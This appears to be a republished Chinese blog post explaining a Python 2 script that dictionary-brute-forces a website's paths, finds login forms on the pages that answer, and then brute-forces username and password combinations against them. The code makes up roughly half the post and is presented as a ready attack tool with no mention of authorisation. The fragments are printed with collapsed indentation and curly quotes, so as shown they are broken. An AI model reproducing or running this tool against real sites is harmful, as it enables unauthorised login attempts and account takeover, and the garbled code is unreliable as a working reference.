您的位置:首页/技术文章
文章详情页

python遍历路径破解表单的示例

【字号: 作者:猪猪浏览:3日期:2022-07-04 16:07:28

首先是利用python遍历路径,采用字典爆破的形式,当然如果只是单纯的爆破路径,简单写一个多线程脚本就行了。这里考虑如何对爆破到的路径进行第二步利用,此处尝试对猜解到的路径进行表单发现及登陆爆破处理。

​首先就是路径爆破,采用多线程队列,爆破路径,判断形式为200响应码。

while not self._queue.empty(): queue = self._queue.get(timeout=0.5) try:r = requests.get(self.url+queue,timeout=5, headers=self.headers)if r.status_code == 200: print '[200] %s' %(queue) soup = BeautifulSoup(r.content,’html.parser’) if soup.find(’form’): self.brute(soup, queue)

猜解到路径后交给brute方法处理,方法实现了一个css选择器,获取form表单中的input字段标签,提取标签参数组合成post参数值,然后提取表单中的action跳转页面,如没有页面默认在当前表单页提交。

input = soup.select('form input') for i in input:try: if i.attrs[’type’] == 'hidden': name, value = i.attrs[’name’], i.attrs[’value’] list_post.append(name+’=’+value) elif i.attrs[’type’] == ’password’: name = i.attrs[’name’] list_post.append(name+’=$$$’) else: name = i.attrs[’name’] list_post.append(name+’=%%%’)except: continue for i in list_post:post = post + i + ’&’ action = soup.find_all(’form’) for i in action:if i[’action’]: actiontag = i[’action’]else: actiontag = queue self.payload(post, actiontag)

获取参数值后,交给payload方法处理登陆,采用requests库的session登陆。获取cookie,先采用session请求获取cookie后,再采用session携带cookie进行请求提交。然后对输入的验证值进行判断是否为登陆成功。

for name in self.username(): post_user = post.replace(’%%%’,name.strip()) for pwd in self.password():post_pwd = post_user.replace(’$$$’,pwd.strip())session = requests.Session()session.get(self.url+’/’+action, headers=self.headers, verify=False)r = session.post(self.url+’/’+action, data=post_pwd, headers=self.headers, verify=False)if self.word in r.content: print ’[username] %s’ %name +’r’ + ’[password] %s’ %pwd return

为了判断是否登陆成功,采用的人为输入判断字符串的形式。也就是脚本执行形式为

python xxx.py http://xxxx.com xxxxx

以上就是python遍历路径破解表单的示例的详细内容,更多关于python 破解表单的资料请关注好吧啦网其它相关文章!

标签: Python 编程
相关文章: